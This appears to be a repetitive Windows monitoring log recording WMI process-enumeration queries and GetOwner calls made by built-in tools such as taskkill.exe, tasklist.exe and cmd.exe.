Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
